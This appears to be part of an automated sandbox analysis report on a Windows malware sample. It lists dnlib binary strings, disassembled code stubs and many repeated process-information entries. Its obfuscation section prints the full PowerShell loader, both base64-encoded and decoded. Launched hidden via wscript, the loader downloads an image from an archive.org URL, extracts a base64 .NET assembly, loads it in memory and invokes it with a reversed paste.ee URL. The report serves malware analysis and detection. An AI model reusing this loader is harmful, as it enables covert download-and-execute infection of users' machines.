Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dllhost.pdbGCTL source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34777563 push ebx; iretd 4_2_00007FFD3477756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347771B4 push E95C8F86h; ret 4_2_00007FFD347771E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004141F2 push edi; ret 5_2_004141FB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004030F0 push eax; ret 5_2_004030F2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00401945 push eax; iretd 5_2_00401948
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041F1EC push ds; ret 5_2_0041F1ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040222D push ecx; ret 5_2_00402235
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004014FC push ecx; ret 5_2_004014FE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041A583 push ebx; ret 5_2_0041A597
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00417D86 push eax; iretd 5_2_00417D8E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041167D push eax; iretd 5_2_0041167E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004016AB push ecx; ret 5_2_004016C5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0321225F pushad ; ret 5_2_032127F9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032127FA pushad ; ret 5_2_032127F9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03219939 push es; iretd 5_2_03219940
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032409AD push ecx; mov dword ptr [esp], ecx 5_2_032409B6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0321283D push eax; iretd 5_2_03212858
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03043929 pushfd ; iretd 10_2_0304392A
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_0304DE18 push eax; iretd 10_2_0304DE19
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03056D1E push ebx; ret 10_2_03056D32
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03054521 push eax; iretd 10_2_03054529
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038109AD push ecx; mov dword ptr [esp], ecx 11_2_038109B6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0309C0F9 push ds; ret 11_2_0309C0FA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0308E58A push eax; iretd 11_2_0308E58B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03097490 push ebx; ret 11_2_030974A4
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A0BA6 push es; retf 11_2_030A0BB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A0E85 push ebp; retf 11_2_030A0E86
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03094C93 push eax; iretd 11_2_03094C9B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368A39A pushfd ; ret 11_2_0368A3A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03695272 push eax; ret 11_2_03695274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368C1BD push ebp; ret 11_2_0368C1BE
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
